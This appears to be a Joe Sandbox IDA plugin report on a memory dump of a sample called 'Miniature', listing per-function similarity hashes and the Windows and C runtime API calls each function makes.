                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                  • String ID: X
                                                  • API String ID: 3777226403-3081909835
                                                  • Opcode ID: 1bbf05f093eece1f0e7d728e4460c2a7f198da0039d71a2dbc5f0f8047cffe7b
                                                  • Instruction ID: 3ef012e092cbd6794d32141bb7fdc41fe9e0df57a214a0be32bc1dcd2876b4ad
                                                  • Opcode Fuzzy Hash: 1bbf05f093eece1f0e7d728e4460c2a7f198da0039d71a2dbc5f0f8047cffe7b
                                                  • Instruction Fuzzy Hash: 8321F671A002889BCF51DF94CC45BEE7BF8AF49304F00405AF404A7241DBB99A88EFA1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 09d05bed176d3f59b148898be3033fba75041caa01d7083a7bfaddde8dee183d
                                                  • Instruction ID: b43c202c9702ddf26d27005f47675a402e22e44363380613fedb355cc784c97f
                                                  • Opcode Fuzzy Hash: 09d05bed176d3f59b148898be3033fba75041caa01d7083a7bfaddde8dee183d
                                                  • Instruction Fuzzy Hash: 5CF159705083019FD715DFA8C880A6ABBE5FF88314F14896EF8999B391DB34E945CF92
                                                  APIs
                                                    • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB07EC
                                                    • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB07F4
                                                    • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB07FF
                                                    • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB080A
                                                    • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB0812
                                                    • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB081A
                                                    • Part of subcall function 00FAFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F9AC6B), ref: 00FAFFA7
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F9AD08
                                                  • OleInitialize.OLE32(00000000), ref: 00F9AD85
                                                  • CloseHandle.KERNEL32(00000000), ref: 00FD2F56
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID:
                                                  • API String ID: 1986988660-0
                                                  • Opcode ID: 671b57950f1c93232ea69c3f082bea80936b5b7bfe9e94a21f70921af02fd73c
                                                  • Instruction ID: 7f55cdd83537e5518fe36ee7fa2060b3456a23fdcc847d6761afdfdeb9e0e325
                                                  • Opcode Fuzzy Hash: 671b57950f1c93232ea69c3f082bea80936b5b7bfe9e94a21f70921af02fd73c
                                                  • Instruction Fuzzy Hash: B881CAB09013448FC3A8EF69E8456277FE9FB493147D0856AE8D8C725AEB3A4805FF51
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FA59F9
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA5A9E
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FA5ABB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: 1c03bf4ea3c8474b3783fca0f91b817a91e6432131acb0c85fe90f932ba8ada9
                                                  • Instruction ID: 4470b19ec7c553b0cd5fde2e12a33ad6e2475d5a57f69c0358d8656dff68fea6
                                                  • Opcode Fuzzy Hash: 1c03bf4ea3c8474b3783fca0f91b817a91e6432131acb0c85fe90f932ba8ada9
                                                  • Instruction Fuzzy Hash: 023191B0A057019FC731DF24D88469BBBF8FB49718F400A2EF5DA87240E779A944EB52
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 00FB5953
                                                    • Part of subcall function 00FBA39B: __NMSG_WRITE.LIBCMT ref: 00FBA3C2
                                                    • Part of subcall function 00FBA39B: __NMSG_WRITE.LIBCMT ref: 00FBA3CC
                                                  • __NMSG_WRITE.LIBCMT ref: 00FB595A
                                                    • Part of subcall function 00FBA3F8: GetModuleFileNameW.KERNEL32(00000000,010553BA,00000104,00000004,00000001,00FB1003), ref: 00FBA48A
                                                    • Part of subcall function 00FBA3F8: ___crtMessageBoxW.LIBCMT ref: 00FBA538
                                                    • Part of subcall function 00FB32CF: ___crtCorExitProcess.LIBCMT ref: 00FB32D5
                                                    • Part of subcall function 00FB32CF: ExitProcess.KERNEL32 ref: 00FB32DE
                                                    • Part of subcall function 00FB8D58: __getptd_noexit.LIBCMT ref: 00FB8D58
                                                  • RtlAllocateHeap.NTDLL(011A0000,00000000,00000001,?,00000004,?,?,00FB1003,?), ref: 00FB597F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: 5928685a030fdb0f1710e11811caa4491791086b92b62bfcfe2ecbdccfd83de6
                                                  • Instruction ID: 8fcd2f1da3bd802fcc5392183a178de40b47aee87b2889e86185bd4db6baa7db
                                                  • Opcode Fuzzy Hash: 5928685a030fdb0f1710e11811caa4491791086b92b62bfcfe2ecbdccfd83de6
                                                  • Instruction Fuzzy Hash: 7C01F536741B06DAE7252B779C02BEE32588F82BB0F500027F9159A1D1DE7D8D01AF61
                                                  APIs
                                                  • _free.LIBCMT ref: 00FF92D6
                                                    • Part of subcall function 00FB2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00FB9C54,00000000,00FB8D5D,00FB59C3), ref: 00FB2F99
                                                    • Part of subcall function 00FB2F85: GetLastError.KERNEL32(00000000,?,00FB9C54,00000000,00FB8D5D,00FB59C3), ref: 00FB2FAB
                                                  • _free.LIBCMT ref: 00FF92E7
                                                  • _free.LIBCMT ref: 00FF92F9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                  • Instruction ID: a0deed25b1e9a465ad7f734ad8fb0888cd5055b616321224d44547760868a44e
                                                  • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                  • Instruction Fuzzy Hash: 98E0C2A1B0860293CA20A53A6C40FF377EC0F88321714040EB509DB142EE68E841B438
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
                                                  • Opcode ID: cf15e6eeab8f52bca79a91320aeef572cb5245617468511dcd3464a859b3c795
                                                  • Instruction ID: 2b2f448b2ad060747225e7cf2dd9598e59eaa281108f46bafad524e97dd548e9
                                                  • Opcode Fuzzy Hash: cf15e6eeab8f52bca79a91320aeef572cb5245617468511dcd3464a859b3c795
                                                  • Instruction Fuzzy Hash: 5A326A71908301CFEB24DF14C591B6ABBE1BF84714F15856DE88A8B362D735EC85EB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: EA06
                                                  • API String ID: 4104443479-3962188686
                                                  • Opcode ID: 649d1e12cb82026fe4e8b2935ac13e9e62c67edb3b58ecb3abc695ec112caf95
                                                  • Instruction ID: 9bca05a1c8567e463c27fb8eaf3467d72f2c236f9d52aaf42dd072d565c72e67
                                                  • Opcode Fuzzy Hash: 649d1e12cb82026fe4e8b2935ac13e9e62c67edb3b58ecb3abc695ec112caf95
                                                  • Instruction Fuzzy Hash: 7A419EB2E041985BDF219B548C517BF7BA58BCB310F184075F882E7286D6A4AE94B3E1
                                                  APIs
                                                  • _strcat.LIBCMT ref: 0100E20C
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                  • _wcscpy.LIBCMT ref: 0100E29B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf_strcat_wcscpy
                                                  • String ID:
                                                  • API String ID: 1012013722-0
                                                  • Opcode ID: 7fc2321255a382fdfbbb12863c2d94ca6e3e9ef91a150766f5d5e325daac5e13
                                                  • Instruction ID: cda0270570066184bfa93f7de7950f4e341d1ad1e985d5653d8581b7f38efbbd
                                                  • Opcode Fuzzy Hash: 7fc2321255a382fdfbbb12863c2d94ca6e3e9ef91a150766f5d5e325daac5e13
                                                  • Instruction Fuzzy Hash: 69914A34A00505DFEB19DF18C9859ADBBE5FF49310B45C49AE84A9F3A2DB34F901CB81
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3712363035-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: 3f18400c2e2d08cf6b33990dad131cd25d004b5b57c46f42e5148831acf50e81
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: 4E31EA71A00109DFD718DF19C480AAAF7A5FF49310B648A95E409CF265DB31EDC1DF80
                                                  APIs
                                                  • IsThemeActive.UXTHEME ref: 00FA5FEF
                                                    • Part of subcall function 00FB359C: __lock.LIBCMT ref: 00FB35A2
                                                    • Part of subcall function 00FB359C: DecodePointer.KERNEL32(00000001,?,00FA6004,00FE8892), ref: 00FB35AE
                                                    • Part of subcall function 00FB359C: EncodePointer.KERNEL32(?,?,00FA6004,00FE8892), ref: 00FB35B9
                                                    • Part of subcall function 00FA5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FA5F18
                                                    • Part of subcall function 00FA5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA5F2D
                                                    • Part of subcall function 00FA5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA526C
                                                    • Part of subcall function 00FA5240: IsDebuggerPresent.KERNEL32 ref: 00FA527E
                                                    • Part of subcall function 00FA5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00FA52E6
                                                    • Part of subcall function 00FA5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00FA5366
                                                  • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00FA602F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                  • String ID:
                                                  • API String ID: 1438897964-0
                                                  • Opcode ID: 360a1ba7e5a5a26dba628e53a160eb0eb785b489c94326eeba6ead0e9ca6597d
                                                  • Instruction ID: d3e14589a030bb691e623c0255879b8f264cf19e7b25e1f633befcbe4e6bfc6c
                                                  • Opcode Fuzzy Hash: 360a1ba7e5a5a26dba628e53a160eb0eb785b489c94326eeba6ead0e9ca6597d
                                                  • Instruction Fuzzy Hash: 1611CD718083019BC720EF69E80594BBFE8FF98750F00851FF485832A5DB799545EF92
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00FA3E72,?,?,?,00000000), ref: 00FA4327
                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00FA3E72,?,?,?,00000000), ref: 00FE0717
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 595d5d0267af329579e4ea467a6f7034f614cbb3b3aeff19224ed4321be5b075
                                                  • Instruction ID: 291da52f01babf9fcd2a2c34cb40b619fbb4b5dfdc6486a1327947f4621a377e
                                                  • Opcode Fuzzy Hash: 595d5d0267af329579e4ea467a6f7034f614cbb3b3aeff19224ed4321be5b075
                                                  • Instruction Fuzzy Hash: FC0184B0184309BEF7300E148C86F767A9CAB52778F10C215FAD45A1D0C6F56C45AB14
                                                  APIs
                                                    • Part of subcall function 00FB593C: __FF_MSGBANNER.LIBCMT ref: 00FB5953
                                                    • Part of subcall function 00FB593C: __NMSG_WRITE.LIBCMT ref: 00FB595A
                                                    • Part of subcall function 00FB593C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001,?,00000004,?,?,00FB1003,?), ref: 00FB597F
                                                  • std::exception::exception.LIBCMT ref: 00FB101C
                                                  • __CxxThrowException@8.LIBCMT ref: 00FB1031
                                                    • Part of subcall function 00FB87CB: RaiseException.KERNEL32(?,?,?,0104CAF8,?,?,?,?,?,00FB1036,?,0104CAF8,?,00000001), ref: 00FB8820
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 3902256705-0
                                                  • Opcode ID: bc590ae88a51701cc97afb45f3e9907b7298e88088dd0d2b2754923411fb7160
                                                  • Instruction ID: 4015c1f63a56f28ac0eb85997b8c3b672976f0562458c5d2ae881dccb4c58773
                                                  • Opcode Fuzzy Hash: bc590ae88a51701cc97afb45f3e9907b7298e88088dd0d2b2754923411fb7160
                                                  • Instruction Fuzzy Hash: 1EF02D3160421DA2C724BB5AFC169DE779CAF01390F500015F81496581DF748A81EED0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __lock_file_memset
                                                  • String ID:
                                                  • API String ID: 26237723-0
                                                  • Opcode ID: 90bbc45ef03d58997e7f6bc2d33110442d14ab168656c2c1dd8b70b1ac0e036d
                                                  • Instruction ID: e8cca3193b7936f6a9c3d15b67d0a2091039cd862d671b79d0601be78825a79c
                                                  • Opcode Fuzzy Hash: 90bbc45ef03d58997e7f6bc2d33110442d14ab168656c2c1dd8b70b1ac0e036d
                                                  • Instruction Fuzzy Hash: 98012171C01649EBCF11AFABDC02ADE7B65AF80760F148115B8285A161D73DCA12FF91
                                                  APIs
                                                    • Part of subcall function 00FB8D58: __getptd_noexit.LIBCMT ref: 00FB8D58
                                                  • __lock_file.LIBCMT ref: 00FB560B
                                                    • Part of subcall function 00FB6E3E: __lock.LIBCMT ref: 00FB6E61
                                                  • __fclose_nolock.LIBCMT ref: 00FB5616
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: a3a200876b46ca00185bf623ecb208ad58e90a02785722ce3de60524357bacd9
                                                  • Instruction ID: d79afe0bfb8ea784f48c9b16afbd67ababe8b01ae14e4ff2bafd770297f08f97
                                                  • Opcode Fuzzy Hash: a3a200876b46ca00185bf623ecb208ad58e90a02785722ce3de60524357bacd9
                                                  • Instruction Fuzzy Hash: 35F09071901B059AD7216B7B8C02BEE77A66F80776F198209A424AB1C1CF7C8942FF55
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 00FB5EB4
                                                  • __ftell_nolock.LIBCMT ref: 00FB5EBF
                                                    • Part of subcall function 00FB8D58: __getptd_noexit.LIBCMT ref: 00FB8D58
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2999321469-0
                                                  • Opcode ID: 171f2fb45658161ba10cb7a3acb80415218f1eec33e7cb7d9423441e285e0907
                                                  • Instruction ID: 44a984dfacaa166ad2c5d15ab9a994513b72479c31de58b7685774af44997efb
                                                  • Opcode Fuzzy Hash: 171f2fb45658161ba10cb7a3acb80415218f1eec33e7cb7d9423441e285e0907
                                                  • Instruction Fuzzy Hash: 2DF0A771A116159ADB01BB768D027DE72946F81771F114206A420FB1D1CF7CCA02FF55
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FA5AEF
                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FA5B1F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell__memset
                                                  • String ID:
                                                  • API String ID: 928536360-0
                                                  • Opcode ID: a3a4e755c47ed94e4dabb7892fa19974e50c6e10897522c2ddbe5992934bc28f
                                                  • Instruction ID: f84a6ba1760fef3c6ffa591f127da9b4dc87a23f73bbc6b31c3a4653f82b1345
                                                  • Opcode Fuzzy Hash: a3a4e755c47ed94e4dabb7892fa19974e50c6e10897522c2ddbe5992934bc28f
                                                  • Instruction Fuzzy Hash: 6DF082708043089BD7A29B249C4679677BC970130CF0001E9BA889628ADB7A4B88DF51
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
